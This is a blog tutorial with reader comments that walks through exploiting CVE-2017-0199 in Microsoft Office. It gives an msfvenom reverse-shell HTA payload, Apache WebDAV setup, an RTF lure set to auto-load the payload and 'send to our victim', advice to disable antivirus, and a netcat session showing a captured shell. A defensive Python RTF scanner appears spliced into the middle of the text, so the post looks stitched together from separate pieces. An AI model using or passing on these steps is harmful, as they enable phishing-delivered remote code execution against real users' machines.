Exploiting CVE-2017-0199 – Complete Guide

Categories: Security, Tutorials

Hello everyone, this month FireEye published a vulnerability known as CVE-2017-0199, which makes use of OLEv2 links in existing documents.
So, what are these OLEv2 object links? Basically, an OLE link is an object (file) that we include in our document and whose content is loaded into that document. In short: a file inside a file.

It sounds confusing at first, but once we start using it and exploiting this vulnerability, it becomes much clearer how it works.

Full Disclaimer: This vulnerability was reproduced in a lab environment and should not be used for bad purposes. The contents and the processes described below were followed based on another blog post. Please check the references below.

So, let's get things started:

Step 1:

Our first step is to create an HTA file (this type of file is an HTML application, which can run JScript and VBScript).

In this example we will assume our file is called “myhta.hta”:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
 <head>
  <meta content="text/html; charset=utf-8" http-equiv="Content-Type" />
  <title>buhletxr-infosec.com</title>
  <script language="VBScript">
   OUR CODE TO GENERATE
  </script>
  <hta:application id="oHTA" applicationname="buhletxr-infosec.com CVE-2017-0199" application="yes">
  </hta:application>
 </head>
 <body>
 </body>
</html>

So this is a basic HTA application, without any script yet.
So, now we need to generate our VBScript code to include in this HTA file.
To do so, let's make use of msfvenom:

# msfvenom -a x64 --platform Windows -p windows/x64/shell_reverse_tcp LHOST=192.168.1.213 LPORT=21747 -f hta-psh
No encoder or badchars specified, outputting raw payload
Payload size: 460 bytes
Final size of hta-psh file: 6823 bytes
<script language="VBScript">
 Set jkqW0xr = CreateObject("Wscript.Shell")
 Set bMBmwd = CreateObject("Scripting.FileSystemObject")
 If bMBmwd.FileExists(jkqW0xr.ExpandEnvironmentStrings("%PSModulePath%") + "..\powershell.exe") Then
 jkqW0xr.Run "powershell.exe -nop -w hidden -e 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"
 End If
</script>

Let's add the script to our HTA file:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
 <head>
  <meta content="text/html; charset=utf-8" http-equiv="Content-Type" />
  <title>Bonjour</title>
  <script language="VBScript">
   Set jkqW0xr = CreateObject("Wscript.Shell")
   jkqW0xr.Run "powershell.exe -nop -w hidden -e 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"
  </script>
  <hta:application id="oHTA" applicationname="buhletxr-infosec.com CVE-2017-0199" application="yes">
  </hta:application>
 </head>
 <body>
 </body>
</html>

Please notice we deleted some lines from our script, since PowerShell wasn't being invoked using that method. (If anyone knows why, please let me know.)
So, now we have our HTA file created, with our reverse shell payload.

Step 2:

Next, we must create a simple RTF document using Word on Windows, with any legitimate content in it. In this case we will write the string “This is just a buhlextr-infosec.com test” and save it as “myrtf.rtf”.

OK, now that we have our two files, we upload them to our web server:

/var/www/html/ms# ls
myhta.hta myrtf.rtf

Step 3:

Now let's configure Apache so that it can serve “myrtf.rtf” as a link target:

# a2enmod dav
# a2enmod dav_fs
# a2enmod dav_lock
# a2enmod headers
# service apache2 restart

Now let's set the content type application/rtf on all files in our web server directory /ms, and allow the PROPFIND requests performed by Microsoft Office.

To do so, edit the file “000-default.conf” located in /etc/apache2/sites-enabled and add the following at the end:

<Directory /var/www/html/ms/>
  Header set Content-Type "application/rtf"
</Directory>
<Directory />
  Dav on
</Directory>

To finish, restart your Apache server:

service apache2 restart

Step 4:

Now we need to create another RTF file (this one is the one we will send to our victim) and insert our RTF object into it.
We will call this file “research-doc.rtf”.
Let's create the file and add the object.

To do so, go to Insert -> Object and select the Create from File tab.
Make sure you select Link to file, and in the filename field enter your URL path:

Then save it.
Note: at this stage, if you have an AV with an updated database, it will detect it and remove it. Disable your AV at this stage.

Step 5:

After creating the file, let's make the OLE object load automatically by adding objupdate between objautlink and rsltpict in our file “research-doc.rtf”.

To do so, open the file in Notepad++, search for object and make the following change:

Change from

\object\objautlink\rsltpict

to

\object\objautlink\objupdate\rsltpict

So now we have our “research-doc.rtf” file, which points to the object “myrtf.rtf”, but we want it to actually point to our HTA file.
So let's go on to the next step.
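A defender-side check for the marker this step inserts, added here as an example (it is not code from the original post or its references): it walks the \object groups of an RTF file, flags \objautlink combined with \objupdate, decodes the \objdata hex and extracts any remote link target stored in it. The sample documents, the OLE1 header bytes and the 192.0.2.10 address are constructed for the example.

```python
import re

URL_RE = re.compile(r"https?://[\x21-\x7e]+")   # printable-ASCII URL
NOT_HEX = re.compile(r"[^0-9A-Fa-f]")            # whitespace/newlines inside \objdata

def balanced_group(text, start):
    """Return the RTF group whose opening brace is at text[start]."""
    depth = 0
    for i in range(start, len(text)):
        if text[i] == "{":
            depth += 1
        elif text[i] == "}":
            depth -= 1
            if depth == 0:
                return text[start:i + 1]
    return text[start:]  # unterminated group: take what is there

def link_targets(objdata_group):
    """Decode a {\\*\\objdata ...} group; return URLs found as ASCII or UTF-16LE."""
    hexdata = NOT_HEX.sub("", objdata_group[len(r"{\*\objdata"):-1])
    blob = bytes.fromhex(hexdata[: len(hexdata) // 2 * 2])
    views = [blob.decode("latin-1")]                                       # ASCII strings
    views += [blob[off:].decode("utf-16-le", "ignore") for off in (0, 1)]  # both alignments
    return sorted({u for v in views for u in URL_RE.findall(v)})

def scan_rtf(text):
    """One finding per \\object group; 'suspicious' marks an auto-updating remote link."""
    findings = []
    for m in re.finditer(r"\{\\object(?![a-z])", text):
        group = balanced_group(text, m.start())
        words = set(re.findall(r"\\([a-z]+)", group))           # control words in the group
        d = re.search(r"\{\\\*\\objdata(?![a-z])", group)
        urls = link_targets(balanced_group(group, d.start())) if d else []
        findings.append({
            "autolink": "objautlink" in words,
            "objupdate": "objupdate" in words,
            "urls": urls,
            "suspicious": "objautlink" in words and "objupdate" in words and bool(urls),
        })
    return findings

# Constructed samples mirroring the edited research-doc.rtf of this tutorial;
# 192.0.2.10 is a documentation address and the header bytes are a stand-in.
LINK = "http://192.0.2.10/ms/myrtf.rtf"
OLE1_HEADER = bytes.fromhex("0105000002000000")
SAMPLE_RTF = (r"{\rtf1\ansi This is just a test {\object\objautlink\objupdate\rsltpict"
              r"\objw1000\objh1000{\*\objdata " + (OLE1_HEADER + LINK.encode("utf-16-le")).hex() + "}}}")
BENIGN_RTF = r"{\rtf1\ansi {\object\objautlink\rsltpict{\*\objdata 0105000002000000}}}"

if __name__ == "__main__":
    for finding in scan_rtf(SAMPLE_RTF) + scan_rtf(BENIGN_RTF):
        print(finding)
```

Running it over a real document means reading the file as text (RTF is 7-bit ASCII) and passing it to scan_rtf; a hit with objupdate and an http URL is the pattern this tutorial produces.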

Step 6:

So now we need to copy the content of “myhta.hta” into “myrtf.rtf” and then change the Content-Type header to application/hta.

Let's do so:

/var/www/html/ms# cat myhta.hta > myrtf.rtf

Now edit your 000-default.conf file, and change from:

Header set Content-Type "application/rtf"

to:

Header set Content-Type "application/hta"

To finish, restart your Apache server:

# service apache2 restart

Step 7:

Let's start our listener and open “research-doc.rtf”:

# nc -nlvp 21747
listening on [any] 21747
connect to [192.168.1.213] from (UNKNOWN) [192.168.1.217] 58028
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\System32>whoami
whoami
desktop-hae3iae\buhletxr

There you go. Shell this! 😉

Note: If you don't like the .rtf extension, rename your final document “research-doc.rtf” to whatever you want, for example .doc; it will also work 😉

References: https://rewtin.blogspot.com.br/2017/04/cve-2017-0199-practical-exploitation-poc.html

6 Comments

  • peneviper
    May 6, 2017

    hey buhl(ex)r thanks for your wonderful tutorial but I have something that is confusing me: can I host a file on a web hosting server to carry out this exploit, because I can't find where I can edit the apache from CLI (or am not getting it right)? I was thinking if I can use a linux vps server for it. I want to host putty and see if it will launch from my server. please can you give me an idea about what to do??

    • admin
      July 28, 2017

      Hi there. Thanks for your appreciation.
      Yes, you can host it on hosting server.

  • Louis
    June 19, 2017

    Hi,

    I'm an Infosec class student and planned to demonstrate this exploit to my class as my assignment.

    I have followed the guide completely but failed to replicate the exploit.

    May I ask what version of Microsoft Office do you use for this demonstration?

    I have tried Office 2007 SP 3, 2010 SP2 and 2013 SP1 without any success.

    The research-doc.rtf just opened fine but no code was executed.

    Thank you,
    Louis

    • admin
      July 28, 2017

      Hi there,

      You should check if the research-doc.rtf has the payload inside or not. If so, then you might have an issue with the nc command, or in the other case, maybe it didn't get the payload from the edited .rtf.

  • judy
    July 21, 2017

    it’s giving error on saving when link the ole

    • admin
      July 28, 2017

      Check if you have any AV or something. If you have AV it will detect it, and remove it.
